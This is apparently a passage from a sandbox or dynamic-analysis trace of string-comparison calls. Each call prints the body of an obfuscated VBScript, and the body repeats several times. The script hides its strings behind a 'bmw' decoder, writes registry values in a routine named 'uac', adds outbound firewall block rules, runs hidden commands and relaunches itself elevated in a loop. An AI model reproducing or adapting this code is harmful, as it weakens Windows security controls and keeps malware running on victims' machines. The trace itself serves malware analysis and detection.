bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.007] wcsncmp (_String1="lse\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.007] wcsncmp (_String1="se\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.007] wcsncmp (_String1="e\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.007] wcsncmp (_String1="\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf 